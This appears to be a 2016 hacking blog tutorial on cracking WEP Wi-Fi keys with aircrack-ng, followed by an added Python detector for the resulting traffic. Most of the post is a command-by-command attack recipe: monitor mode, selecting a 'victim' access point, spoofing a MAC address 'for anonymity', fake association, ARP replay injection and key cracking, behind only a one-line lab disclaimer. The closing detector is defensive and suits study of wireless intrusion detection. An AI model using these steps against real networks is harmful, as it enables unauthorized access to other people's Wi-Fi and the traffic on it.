2016-08-06

Aircrack Basics for Wi-Fi Sheep Hunters

AIRCRACK BASICS
By: @donds https://hackvault.blogspot.com

The instructions below are strictly for research and educational purposes only. Please set up a test lab; it is illegal to hack an AP without permission.

The steps below might not always work, but they do most of the time. They work very well when a client is connected to the AP, but of course you can fake that too.

TIPS: Change your monitoring interface's MAC address for anonymity and to make it easy to remember, for example 11:22:33:44:55:66. Use macchanger.

Let’s start AirCrackin’

PHASE 1
-OPEN A TERMINAL WINDOW (Terminal 1)
1. Set the interface to monitor mode:
            airmon-ng start [interface]
2. To recon the airwaves, use airodump-ng:
            airodump-ng [interface]
3. Select a victim and take note of the SSID, channel and MAC address.
4. Stop airodump-ng, then restart it locked to that channel with the write option to start capturing the IVs:
            airodump-ng -c [channel] -w [filename] [interface]
-LEAVE Terminal 1 PROCESS RUNNING

PHASE 2
-OPEN A SECOND TERMINAL WINDOW (Terminal 2)
5. Inject some "care packages" to generate IVs. Get creative! Take your pick.

NOTE: To test whether the target AP accepts packet injection from your card, use the following command. You are looking for a 100% injection result.
            aireplay-ng -9 -e [vic ssid] -a [vic mac] [interface]

Fake association with the victim AP
            aireplay-ng -1 0 -e [vic ssid] -a [vic mac] -h [your mac] [interface]
OR use this for picky access points
            aireplay-ng -1 6000 -o 1 -q 10 -e [vic ssid] -a [vic mac] -h [your mac] [interface]

You have to get a successful association before you can continue. Your ARP request replay packets will not generate any initialization vectors (IVs) if you are not associated with the AP.

Run ARP request replay mode
            aireplay-ng -3 -b [vic mac] -h [your mac] [interface]

-LEAVE Terminal 2 PROCESS RUNNING

PHASE 3
-OPEN A THIRD TERMINAL WINDOW (Terminal 3)
6. Start cracking with aircrack-ng [filename], pick the victim SSID from the list, then go. You can also use the FMS/KoreK method by adding -K to the command above.

With FMS/KoreK you will need approx. 250,000 IVs for a 64-bit key and 1.5M IVs for a 128-bit key.

For the PTW method (the default), you'll need about 20,000 packets for a 64-bit key and 40,000 packets for a 128-bit key.
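Seen from the other side of the AP, the procedure above leaves an obvious footprint: ARP request replay re-sends the same ARP request hundreds of times per second, and the fake-association keep-alive re-associates one client MAC over and over. The following is an added example, not code from the original post, of a small offline detector for that pattern; the frame records, the attacker MAC (the 11:22:33:44:55:66 from the tip above) and the thresholds are all constructed assumptions, not real captures or tuned values.

```python
# Added example (not from the original post): an offline detector for the
# traffic pattern produced by ARP request replay and repeated fake association
# against a WEP AP.  Sample frames are constructed, thresholds are assumptions.
from collections import defaultdict

# Each constructed record: (timestamp_seconds, source_mac, frame_kind)
# frame_kind: "arp_req" = data frame carrying an ARP request,
#             "assoc"   = association request, "data" = ordinary traffic.
SAMPLE_FRAMES = (
    [(i * 0.002, "11:22:33:44:55:66", "arp_req") for i in range(600)]  # replay burst, ~500/s
    + [(i * 0.5, "11:22:33:44:55:66", "assoc") for i in range(12)]     # -1 6000 keep-alive style
    + [(i * 0.3, "aa:bb:cc:dd:ee:01", "data") for i in range(10)]      # legitimate client
    + [(i * 2.0, "aa:bb:cc:dd:ee:01", "arp_req") for i in range(3)]    # normal ARP rate
)

ARP_REQ_PER_SEC = 50     # assumed: real clients send a handful of ARP requests per minute
ASSOC_PER_MINUTE = 5     # assumed: one client re-associating repeatedly is suspicious


def detect_wep_injection(frames, window_s=1.0, arp_threshold=ARP_REQ_PER_SEC,
                         assoc_threshold=ASSOC_PER_MINUTE):
    """Return {source_mac: set of alert names} for MACs matching the injection pattern."""
    arp_counts = defaultdict(int)    # (mac, 1-second window) -> ARP requests seen
    assoc_counts = defaultdict(int)  # (mac, 1-minute window) -> association requests seen
    for ts, mac, kind in frames:
        if kind == "arp_req":
            arp_counts[(mac, int(ts // window_s))] += 1
        elif kind == "assoc":
            assoc_counts[(mac, int(ts // 60))] += 1

    alerts = defaultdict(set)
    for (mac, _), count in arp_counts.items():
        if count > arp_threshold:          # same ARP request replayed at wire speed
            alerts[mac].add("arp_replay")
    for (mac, _), count in assoc_counts.items():
        if count > assoc_threshold:        # fake-auth keep-alive re-associating
            alerts[mac].add("repeated_assoc")
    return dict(alerts)


if __name__ == "__main__":
    for mac, names in detect_wep_injection(SAMPLE_FRAMES).items():
        print(f"{mac}: {', '.join(sorted(names))}")
```

Feeding this the per-frame summary from a monitor-mode capture (or a WIDS export) flags the injecting MAC within the first second of the replay; the legitimate client's occasional ARP requests stay below both thresholds.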